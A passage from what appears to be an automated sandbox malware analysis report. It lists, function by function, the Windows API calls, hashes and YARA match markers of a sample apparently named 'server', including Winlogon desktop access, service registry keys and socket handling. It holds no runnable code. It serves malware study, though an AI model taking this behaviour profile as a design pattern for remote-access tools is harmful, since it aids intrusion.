                                                                                              • Instruction Fuzzy Hash: 21F0F4366003516BE228EB549C86FBF779AEFC0755F14042DFB415E241DBB4BC4682B2
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 10012B11
                                                                                              • GetThreadDesktop.USER32(00000000), ref: 10012B18
                                                                                                • Part of subcall function 10012AC0: OpenDesktopA.USER32(?,00000000,00000000,400001CF), ref: 10012AD3
                                                                                              • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 10012B44
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DesktopThread$CurrentMessageOpenPost
                                                                                              • String ID: Winlogon
                                                                                              • API String ID: 1322334875-744610081
                                                                                              • Opcode ID: 396b67e399f582221f47aa72e7d8659033b76d44156f69e5a7280715aeba948b
                                                                                              • Instruction ID: 8ff4991761b0dff3829612d51007d4e4f7b3ebdfccf44ddc9c980502df986e38
                                                                                              • Opcode Fuzzy Hash: 396b67e399f582221f47aa72e7d8659033b76d44156f69e5a7280715aeba948b
                                                                                              • Instruction Fuzzy Hash: EDE086B2A413A027F62167707C8AFEB22059F05740F054030FA029E181E7B4DEE251E2
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,PeekNamedPipe), ref: 1001138A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 10011391
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: PeekNamedPipe$kernel32.dll
                                                                                              • API String ID: 2574300362-3402591003
                                                                                              • Opcode ID: 37be9f72f6ca300e1428dd39efc81c674823f9abed165e292987da6a783efa52
                                                                                              • Instruction ID: 1234715f33eb3a59c65f095741a8430bc1c869571d7f7331aa22a25da0abe920
                                                                                              • Opcode Fuzzy Hash: 37be9f72f6ca300e1428dd39efc81c674823f9abed165e292987da6a783efa52
                                                                                              • Instruction Fuzzy Hash: B3C09B70401B74E7FB049BB04D4C7453665D6457013404701F791D5124C77855C1EF19
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,WaitForMultipleObjects), ref: 1001148A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 10011491
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: WaitForMultipleObjects$kernel32.dll
                                                                                              • API String ID: 2574300362-425320575
                                                                                              • Opcode ID: ff427f7aa768ca3a8ed3ff132f2c19765d7d1b01677b2b3afdfe7a8a9e40baff
                                                                                              • Instruction ID: bb72085c76fc3cd786db20b2684e91290bb1d992f234a8e5dbf67af8a632e61f
                                                                                              • Opcode Fuzzy Hash: ff427f7aa768ca3a8ed3ff132f2c19765d7d1b01677b2b3afdfe7a8a9e40baff
                                                                                              • Instruction Fuzzy Hash: B7C09B71401BA4D7FB049BB04D8C6453665D6457153504601F78199120C77854C1E65E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f273f069ea18d1aa5b4337fc6a977d5543074f6f7179b24e1d4bdb7c5cae4ea
                                                                                              • Instruction ID: e05905e1c01977d2d0b956cff86eb2a38737ca1d4fd010b57140b871a74b783a
                                                                                              • Opcode Fuzzy Hash: 2f273f069ea18d1aa5b4337fc6a977d5543074f6f7179b24e1d4bdb7c5cae4ea
                                                                                              • Instruction Fuzzy Hash: 33716673A002107BDB227A268D40BAB3A699B417A4F15413BFC55BB2F1DB38DE41D2DC
                                                                                              APIs
                                                                                              • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00402F62), ref: 004026E0
                                                                                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00402F62), ref: 00402704
                                                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00402F62), ref: 0040271E
                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00402F62), ref: 004027DF
                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00402F62), ref: 004027F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual$FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 714016831-0
                                                                                              • Opcode ID: 8f3c31f509a3233290b576d4393d2cb65234ee27b82ca2d76f99f18585f5a399
                                                                                              • Instruction ID: a04098866118948378d325ab6d9eb96549c892597020e1ecc4c4a2e7dacd7581
                                                                                              • Opcode Fuzzy Hash: 8f3c31f509a3233290b576d4393d2cb65234ee27b82ca2d76f99f18585f5a399
                                                                                              • Instruction Fuzzy Hash: E831E274640705ABD330CF24ED89B26BBA0FB44B94F10453AE156A77D0E7B8A8459B8C
                                                                                              APIs
                                                                                              • lstrlen.KERNEL32(76F90F00,?,00000000,76F90F00,00000000,10002605,00000000,?), ref: 100011CE
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 100011D8
                                                                                              • strchr.MSVCRT ref: 100011FA
                                                                                              • strchr.MSVCRT ref: 10001213
                                                                                              • atoi.MSVCRT(00000001), ref: 10001220
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strchr$??2@atoilstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3786266066-0
                                                                                              • Opcode ID: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
                                                                                              • Instruction ID: fbe44b17f1b507f99859eaa0b90b0c883dd8256749a52aba7323050170f11358
                                                                                              • Opcode Fuzzy Hash: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
                                                                                              • Instruction Fuzzy Hash: E501F5326003645FEB00DF699C847ABB7DAEFCA351F040069EA04DB301D7B16905CB62
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A048,000000FF), ref: 1000ED36
                                                                                                • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000ED88
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A048,000000FF), ref: 1000ED98
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000EDF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@$Open
                                                                                              • String ID:
                                                                                              • API String ID: 2374869923-0
                                                                                              • Opcode ID: be878bee1e9da73a1a5f096cd974a78e79cbd151493b477e63510d5e1f51a3d3
                                                                                              • Instruction ID: e9e04c6913910b47a72650e0984c01a22b61d2a3179dad928c464d9a0ff9bdc2
                                                                                              • Opcode Fuzzy Hash: be878bee1e9da73a1a5f096cd974a78e79cbd151493b477e63510d5e1f51a3d3
                                                                                              • Instruction Fuzzy Hash: 1731E2756046854FD308DE29CC91A6BB3DAEB88750F44492DF906E3385EB35ED09C792
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A028,000000FF), ref: 1000EBA6
                                                                                                • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000EBF8
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A028,000000FF), ref: 1000EC08
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000EC62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@$Open
                                                                                              • String ID:
                                                                                              • API String ID: 2374869923-0
                                                                                              • Opcode ID: 7532c89eedc79a481d8bda5d46ac26f2cc1cf5e389e941ce04d86380d7f123a9
                                                                                              • Instruction ID: 32baaf49ce42a5a358fea7d510f57c92a2b0a776ecfe257346ecd251500ef787
                                                                                              • Opcode Fuzzy Hash: 7532c89eedc79a481d8bda5d46ac26f2cc1cf5e389e941ce04d86380d7f123a9
                                                                                              • Instruction Fuzzy Hash: B631D5766046845BE718DF28CC91A6BB3D6FBC8750F44492CF91693381EB36EE09C792
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A068,000000FF), ref: 1000EE96
                                                                                                • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000EEE8
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A068,000000FF), ref: 1000EEF8
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000EF52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@$Open
                                                                                              • String ID:
                                                                                              • API String ID: 2374869923-0
                                                                                              • Opcode ID: 4de5b2bcd11564635852ac1862835492fbd04a804923473cb2cbacd37bbce42b
                                                                                              • Instruction ID: 529d2750a5032d3fa2bb58871a274eaf41767a3587e5389a20a4cf427fd15475
                                                                                              • Opcode Fuzzy Hash: 4de5b2bcd11564635852ac1862835492fbd04a804923473cb2cbacd37bbce42b
                                                                                              • Instruction Fuzzy Hash: 5331F5762046895BD308DE24C85166BB3D6FBC8750F44493CFA1693381DB36ED09C752
                                                                                              APIs
                                                                                              • LookupAccountSidA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000001,00000000), ref: 1001188D
                                                                                              • LookupAccountSidA.ADVAPI32(00000000,?,00000008,00000000,?,00000001,00000000), ref: 100118D3
                                                                                              • wsprintfA.USER32 ref: 10011901
                                                                                              • 740D24A0.WTSAPI32(?), ref: 10011917
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AccountLookup$wsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1244087393-0
                                                                                              • Opcode ID: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                                                                                              • Instruction ID: 75ed8c1a40449dc84bd528c53c0faca8b09c11902cbaf50b3a4e55cf154f28bc
                                                                                              • Opcode Fuzzy Hash: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                                                                                              • Instruction Fuzzy Hash: F5316D71208346AFE714CE55C8D4DABB3E9FBC8244F404E2DF68997240EA70ED498B62
                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 100034DE
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100034F4
                                                                                              • memmove.MSVCRT(00000000,?,00000000,?,?,?,?,10003C99,?,00000005,00000005,00000000,?,?,?,?), ref: 10003545
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1000356B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Entermemmove
                                                                                              • String ID:
                                                                                              • API String ID: 72348100-0
                                                                                              • Opcode ID: 9319d6ca4cf1f7743dc80d861c7da3a57f412d66edda9e2185804d81a0dc3cd4
                                                                                              • Instruction ID: 41d1a370f2508b90d1dbac8cc85ef313bd04c1718ccfcefffe6925d1250f8bb9
                                                                                              • Opcode Fuzzy Hash: 9319d6ca4cf1f7743dc80d861c7da3a57f412d66edda9e2185804d81a0dc3cd4
                                                                                              • Instruction Fuzzy Hash: 7D11B2363047149BEB05EF749C9946FBBDDEB45291700842DF90397356EE61ED088690
                                                                                              APIs
                                                                                              • LocalSize.KERNEL32(00000000), ref: 1000E86E
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000E87A
                                                                                              • LocalSize.KERNEL32(00000000), ref: 1000E895
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000E8A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$FreeSize
                                                                                              • String ID:
                                                                                              • API String ID: 2726095061-0
                                                                                              • Opcode ID: 73ed662e9077a12b636155e595c78231a86c37c4a05c0cf786f9a6ba96991d1d
                                                                                              • Instruction ID: 4cc34419d7a70d166c584db2d14c90f329438d3833b5948d6052ee62cb9623d3
                                                                                              • Opcode Fuzzy Hash: 73ed662e9077a12b636155e595c78231a86c37c4a05c0cf786f9a6ba96991d1d
                                                                                              • Instruction Fuzzy Hash: 3711BE75105A909BF225EB14CC92BFFB39DEF85390F044A29F955A3288CF34AC05C7A2
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,00000000,00000000,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 00401570
                                                                                              • VirtualFree.KERNEL32(5D5E5FC0,00000000,00008000,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 00401597
                                                                                              • GetProcessHeap.KERNEL32(00000000,00401127,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 004015A0
                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,0040171B,?), ref: 004015A7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$Heap$LibraryProcessVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 548792435-0
                                                                                              • Opcode ID: e9e061fe8da8502694f74ff8a4bd2ba7532c858e7373bff758fa61282ed922f1
                                                                                              • Instruction ID: 2d8dcf72d340e61f505ec02cbb84714f2cdd3d0f75e656bd935d2cd45be4ba94
                                                                                              • Opcode Fuzzy Hash: e9e061fe8da8502694f74ff8a4bd2ba7532c858e7373bff758fa61282ed922f1
                                                                                              • Instruction Fuzzy Hash: 91113C71740701ABD720CB6ADC85F17B7E8AF88750F054929F55BEB2E0CB34E8418B58
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,76F92EE0,?,00000000,10069CEC,000000FF,100027A0), ref: 100038BC
                                                                                              • CloseHandle.KERNEL32(?), ref: 100038DF
                                                                                              • CloseHandle.KERNEL32(?), ref: 100038E8
                                                                                              • WSACleanup.WS2_32 ref: 100038EA
                                                                                                • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                                                                                • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                                                                                • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                                                                                • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                                                                                • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 136543108-0
                                                                                              • Opcode ID: 3baf7999bc17034cde08045e60d2599934fcebe03a3ba73ab888b9dc19cb423c
                                                                                              • Instruction ID: 93ec0bc8b686358acc24e3714501cd84e213c2281eabc8766456639a8591c71b
                                                                                              • Opcode Fuzzy Hash: 3baf7999bc17034cde08045e60d2599934fcebe03a3ba73ab888b9dc19cb423c
                                                                                              • Instruction Fuzzy Hash: C3115E34104B919FE312DB24C844B5BB7E9EB85724F408A0DF0A6566D1CBB868098BA2
                                                                                              APIs
                                                                                              • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B04E
                                                                                              • lstrlen.KERNEL32(?), ref: 1000B05E
                                                                                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000002,?,00000000), ref: 1000B074
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 1000B084
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
